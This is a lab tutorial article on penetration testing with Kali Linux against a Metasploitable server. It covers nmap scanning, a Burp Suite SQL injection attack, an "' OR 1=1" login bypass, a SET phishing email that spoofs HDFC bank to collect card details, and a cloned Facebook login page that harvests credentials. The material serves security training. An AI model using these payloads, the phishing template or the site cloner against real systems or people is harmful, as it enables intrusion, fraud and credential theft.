Ethical hacking attacks using Kali Linux

Vandhana Venugopalan, CISA, AWS CCP

Vice President, Cybersecurity and Technology at Chase UK

1 article
April 2, 2020
There are only two types of companies: those that have been hacked, and those that will be
-Robert Mueller FBI Director, USA

We keep hearing millions of cyber crimes and hacking news all over the web world. To stay
safe and not to be a prey for such attacks, it is high time to know the existing weaknesses in
the networks & systems that we work on and be watchful of some common attack methods
that the hackers use. Remember- To attack someone, you should know their weaknesses than
their strengths! It is time for us to put on the 'Hacker's Hat' (in an ethical way!!) to look at the
exploitation opportunities through their eyes and stay covered! Let's get started.

EXECUTIVE SUMMARY
The purpose of this project publication is to walk the readers through some of the certified
penetration testing and ethical hacking attack methods on Metasploitable vulnerable server
and hosted websites on that server using Kali Linux commands. These methods help you to
gather sensitive information and exploit the identified vulnerabilities through further
advanced methods.

**Disclaimer** This publication is a detailed narrative on 6 of the hacking methods along

with steps to perform them and expected results. You can scroll across sections if you are
interested in reading only about few of the specific attacks.

1. Information Gathering
2. Vulnerability analysis
3. Web Penetration test
4. Exploitation tools
5. Email Phishing attack
6. Website Cloning

Lab requirements:

1. Oracle Virtual Box environment

2. Virtual machine to perform the attack- Kali Linux
3. Vulnerable server to attack- Metasploitable

LAB SETUP
Testing lab for ethical hackers is more like a play field for an athlete. This is the place
where we get our hands dirty by gathering information and to perform practical attack
methods against the weak systems.

Penetration testing lab is set up on Virtual Box as it allows us to create Virtual Machines
inside the current OS (Host OS).

To set up the lab environment, the following programs need to be downloaded and installed:

1.Oracle Virtual Box (For the respective OS in your computer)

Download page: https://www.virtualbox.org/wiki/Downloads

2. Attacker machine- Kali Linux

Download page- https://www.kali.org/downloads/

3.Victim (vulnerable machine)- Metasploitable 2

(This is a vulnerable Linux distro that contains a number of vulnerabilities for pen testers to
try and hack it)

Download page- https://information.rapid7.com/metasploitable-download.html

NOTE: This project pertains to performing the attack methods with a base prerequisite of
having the lab environment set up. Configuring the lab environment is not covered as a part
of the narrative.

Here is a snapshot of the virtual box lab environment once virtual machines are successfully
installed.

To perform the attack methods, make sure to gather the ip address information of the victim
machine. In this case, Metasploitable machine. Type- ifconfig and capture the ip address of
the Metasploitable machine as below: 10.0.2.4
PENETRATION TESTING- TYPES AND ATTACK
METHODS
Penetration testing, also called pen testing or ethical hacking, is the practice of testing a
computer system, network or web application to find security vulnerabilities that an attacker
could exploit. The process involves gathering information about the target before the test,
identifying possible entry points, attempting to break in -- either virtually or for real -- and
reporting back the findings.

Types of pen test:

1.Black Box Pen test- Tester has no idea about the systems that he is going to test; does not
examine any programming codes.

2.White Box Pen test- This is a comprehensive testing, as tester has been provided with
whole range of information about the systems and/or network.

3.Grey Box Pen test- tester usually provides partial or limited information about the internal
details of the program of a system.

Ethical Hacking- Attack tools in Kali Linux:

Kali Linux is one of the best security packages for an ethical hacker, that contains a set of
attack tools classified into various phases of pen testing. It is an open source and its official
web page is https://www.kali.org

Below are some of the in-built penetration testing programs provided by Kali Linux:
1. INFORMATION GATHERING
Tool used- NMAP

NMAP is a tool used for the initial information gathering and network scanning phase of
Ethical Hacking in Kali Linux

NMAP uses raw IP packets in novel ways to determine which hosts are available on the
network, what services (application name and version) those hosts are offering, which
operating systems (and OS versions) they are running, what type of packet filters/firewalls
are in use, etc.

Target to scan: Metasploitable vulnerable server with IP Address: 10.0.2.4

Step 1 − Open Applications→ 01-Information Gathering → nmap.

Step 2- Use the nmap command to scan and identify the open ports:

nmap 10.0.2.4
Step 3- Analyzing the scan results- As shown in the above results screen, these 23 ports are
open and vulnerable for any external attacks. SERVICE shows the service for which the port
is used.

For example-

80/tcp is a TCP service. Any TCP attacks can be targeted towards this port to access the
further information.

513/tcp is a login service- This shows that the port is used for login service. Any password
attacks can be targeted towards this port.

2. VULNERABILITY ANALYSIS
Tool used- NMAP

NMAP can also be used to scan any network vulnerabilities in the target server. There are
vast number of commands to execute and check specific weaknesses in the servers. Here we
are going to validate if the server is exposed to SQL Injections.

Target to scan: Metasploitable vulnerable server with IP Address: 10.0.2.4

Step 1 − Open Applications→ 02-Vulnerability Analysis → nmap.

Step 2- Use the nmap command to perform the vulnerability analysis relating to SQL
injection:

nmap –p80 –script http-sql-injection 10.0.2.4

Step 3- Analyzing the scan output- As shown in the above results screen, there are multiple
web application URL that are hosted in the server and vulnerable to SQL injection.

For example-
•The results show login.php and user-info.php are exposed to SQL injection attacks (We
will be seeing one example of this attack later in the Password cracking section)

•It is also evident that there are many sensitive pages like password and admin account
pages that are vulnerable to SQL injection attacks.

3. WEB PENETRATION TESTING- INTRUDER

ATTACK
Tool used- Burp Suite

Now that we have gathered information on the basic vulnerabilities in the server’s web
applications, we are going to perform some of the attack methods on those vulnerabilities.

Here is a sniffing and scanning attack on one of the vulnerable websites listed in the
Vulnerability scan results- which is Mutillidae. Below are the steps on how to perform an
intruder attack using proxy server settings.

Step 1: Launch the Metasploitable home page in Kali Linux browser using the IP Address
10.0.2.4 which we gathered before starting the attack methods from Metasploitable command
window. Click on Mutillidae, one of the web applications hosted on the server.
Step 2: Click on the web application- Mutillidae. Follow the menu options: OWASP Top
10 -> Injection (SQL)-> Extract Data-> User Info. You will be greeted with a login screen.

Step 3: Now configure the attack browser. Open up the browser's Preferences->Advanced-
>Network->Settings next to the Connection spot, then make sure it's set to Manual proxy
configuration and enter 127.0.0.1 as the HTTP Proxy and 8080 as the Port. Now apply the
changes and close. Proxy is set up successfully now.
Toggle back to login page: Enter an arbitrary username and attempted to log in to capture
the actions in Burp Suite scan.

Step 4: Launch Burp Suite to open new project. Now we will be interrupting the above web
page request with Burp Suite.
Step 5: Navigate to Proxy tab and make sure Intercept is on.

NOTE: We're primarily interested in the username field since this is what we will modify to
test for SQL injection flaws.

Step 6: Click on the Action button, then Send to Intruder

Step 7: Configure Positions & Payloads by clearing all the positions to start with. Under
Positions tab now you will be able to see the actions performed on the web page as the proxy
address has been set up in the browser.

From the Proxy->Positions tab, Highlight the value entered for username, and click the Add
button. We will use the Sniper attack type which will run through a list of values in the
payload and try them one at a time.
Step 8: SQL Injection- The actual login query looks like below:

SELECT username, password FROM users WHERE username='myname' AND

password='mypassword’;

which we will be modifying to the classic SQL injection query as below:

SELECT username, password FROM users WHERE username='' or 1=1-- AND

password=‘’;

The single quote effectively turns the first part into a blank string, and 1=1 always evaluates
to true, so the username query will now run as "blank" or "true. Since these values are
always true, and the password field is ignored, the database will return account data.

Step 9: Setting up the payload: Kali comes with a variety of word lists including one
specifically for testing SQL injection vulnerabilities. Hit Load and navigate to
/usr/share/wordlists/wfuzz/injection/SQL.txt. Now, we are prepared to launch our attack!
Step 8: Click the Start attack button, and a new window will pop up showing the intruder
attack. Once intruder is finished, you can view the details of any request simply by clicking
on it.
Step 9: Analyse the scan results- Select the SQL Injection query line record in the Burp
Suite as below. On clicking the ‘Response’ tab, you will be able to see the actual web page
render. You can see the list of username and passwords sniffed out of this pen test scan.

4. EXPLOITATION TOOLS
Method used- SQL injection

Sometimes if the username is the only information available and password for the user
account is not exposed using other hacking methods, the SQL database errors can be utilized
to inject the SQL query and Bypass the login prompt.

Step 1: Open the Metasploitable server in Kali Linux and launch Mutillidae login page.
Step 2: As we know that one of the login account names is ‘admin’, we are going to try and
crack the login. Here I have entered a random username and password to analyse how the
page is responding to gather some web page error information.

Username: vandy, password- sfdsfds

Database error is displayed as:

SELECT * from ACCOUNTS where username=‘vandy’ AND password=‘sdfsdfs’

As the error page is vulnerable and exposes database information, this can be utilized to
bypass the login page. This can be done by using the classic SQL Injection of 1=1 condition.
Any password that is typed, goes between the single quotes in password=‘’. For this
condition to stay true, SQL injection of 1=1 condition can be inserted so that the whole query
executes to be true as below.

SELECT * from ACCOUNTS where username=‘vandy’ AND password=‘sdfsdfs’ OR 1=1

By backtracking this to the login page, enter username=admin and password=sdfsdfs’ OR

1=1. This clears the login prompt and allows us to enter as the query executes to true. Now
we are logged in with ‘admin’ account without knowing the password.

5. EMAIL PHISHING ATTACK

Tool used: Social Engineering Toolkit (SET)
One of the interesting and most common social engineering attack is Phishing. Emails are
spoofed from a genuine source to gather sensitive and confidential information from the
customer which could be further utilized for advanced attacks.

SET is a tool offered by Kali Linux through which email attacks could be performed by
spoofing the email source to appear as if it is from a legitimate body. Here is an example:

Step 1: Launch Application-> Social Engineering-> SET as below in Kali Linux

The home screen looks as below with the social engineering menu options.
Step 2: On choosing the above options, the toolkit prompts with few self-defined
questionnaire to build the mail template based on the attacker’s requirements. In this
example, I have spoofed the email to be coming from the top banks gather the credit card
details.

Step 3: Provide the email subject and body in such a way that it triggers an urgency in
readers’ minds to share the sensitive information immediately.

In the above example, the attacker email is a fake bank email ID to spoof the originality of
HDFC bank.

Attacker's email: hdfccreditcardservicemail@gmail.com

Victim’s email is- pentestattack678@gmail.com

After executing the above SET attack, below is how the email is received in the Victim’s end
to give a sense of urgency and panic to share the confidential information.
6. WEBSITE CLONING
Tool used: Social Engineering Toolkit (SET)

This is one another common method used to hack the username and password details from
the user by cloning any of the popular social media site. Below is an example where we are
going to clone www.facebook.com by pointing our system IP Address to the Facebook login
page.

Step 1: Launch Application-> Social Engineering-> SET as below in Kali Linux

The home screen looks as below with the social engineering menu options.

Step 2: Select the following options to launch the website clone attack:

Social engineering attacks-> Website attack vectors-> Credential Harvester Attack

method-> Site Cloner

Step 3: Provide the system’s external IP Address which you would like to clone it as any of
the social media website. This can be obtained by running the command ifconfig in kali
Linux. In my case, the external IP Address is: 10.0.2.15 which is plugged in for cloning as
below.

Step 4: Now, provide the public social media site that you would like to spoof your ip
address to capture the user credentials. In my example, I have used facebook.com

Step 5: Cloning is now complete! Launch your IP Address in the web browser as below-
you will be able to see that the web page has been cloned to how Facebook login page
appears. Note the IP Address 10.0.2.15 on the below screen that launches the cloned
Facebook site.

Step 6: Login with any test email and password, hit login.
Step 7: As this is a cloned website and the ip address points to the local system, the user
credentials entered on the web page have been recorded into the local file system under
below path:

/var/www/html/

This path contains the credentials harvest .txt file that contains the log of what has been
entered in the cloned login page by the victim user as below.

Alright, that's a lot of learning! Go ahead and try them out. Below are some of the references
that can be used for further learning and experiments:

1. Cybersecurity resources from ISACA: https://cybersecurity.isaca.org/csx-resources

2. Web Security Academy by PortSwigger: https://portswigger.net/web-security
3. Techtarget knowledge blog:
https://searchnetworking.techtarget.com/tutorial/Penetration-testing-strategies
4. Github Penetration testing forums: https://github.com/topics/penetration-testing
5. Cybrary online free courses and resources: https://www.cybrary.it/course/ethical-
hacking/
6. Udemy Pen test online courses- https://www.udemy.com/topic/penetration-testing/
7. zSecurity- https://zsecurity.org/